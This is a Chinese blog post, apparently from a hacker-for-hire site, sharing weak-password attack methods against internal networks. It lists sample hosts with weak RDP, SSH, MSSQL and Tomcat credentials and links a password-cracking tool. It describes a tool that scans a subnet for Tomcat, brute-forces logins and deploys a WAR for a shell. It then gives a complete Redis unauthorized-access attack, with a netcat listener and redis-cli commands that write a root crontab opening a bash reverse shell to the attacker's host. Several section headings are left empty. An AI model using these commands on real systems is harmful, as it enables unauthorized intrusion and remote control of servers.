黑客接单网:渗透的一些弱口令思路分享

       好久时间没有更新网站了,很多小伙伴都问我是不是受疫情影响,网站不开了,这让黑客武林的小伙伴十分伤心,现在我来跟大家说说为什么前段时间网站一直为什么打不开,因为我之前解析的是cf节点,由于后来更换了服务器,解析忘记更改了,加上前段时间也有自己的事情在忙,所以没时间更新文章,请大家谅解。

0x01 内网弱口令

RDP、SMB弱口令 192.168.232.136 user1/user1***   win7
SSH弱口令      192.168.232.180 root/rootroot   centos
MSSQL弱口令    192.168.232.135 sa/sa123***     win2012‐iis
Tomcat弱口令   http://192.168.111.145:8080/manager/html
Redis未授权

工具下载:

https://github.com/shack2/SNETCracker

0x02 RDP、SMB弱口令

黑客接单网

0x02 MSSQL弱口令

0x03 SSH弱口令

0x04 Tomcat弱口令

使用方法

上传war.exe和666.war文件
运行 war.exe ‐‐cidr 172.17.2.0/24
会自动扫描C段的tomcat,并且跑弱口令。成功跑出则会自动部署war上传getshell。
扫描日志记录在当前文件夹下的log.txt里

0x05 Redis未授权

同样通过超级弱口令工具扫描redis

利用计划任务执行命令反弹shell

在redis以root权限运行时可以写crontab来执行命令反弹shell

先在自己的服务器上监听一个端口

nc ‐lvnp 7999

然后执行命令:

root@kali:## redis‐cli ‐h 192.168.63.130

      192.168.63.130:6379> set x "\n* * * * * bash ‐i >& /dev/tcp/192.168.63.128/7999 0>&1\n"
      192.168.63.130:6379> config set dir /var/spool/cron/
      192.168.63.130:6379> config set dbfilename root
      192.168.63.130:6379> save

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heike50.cn/heikejiedan/33.html